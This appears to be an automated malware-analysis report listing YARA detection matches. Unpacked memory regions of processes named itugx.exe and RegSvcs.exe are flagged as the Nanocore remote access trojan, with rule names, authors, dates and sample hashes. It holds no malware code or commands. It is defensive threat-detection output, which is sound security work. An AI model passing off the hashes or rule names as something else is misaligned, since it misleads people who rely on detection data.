      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
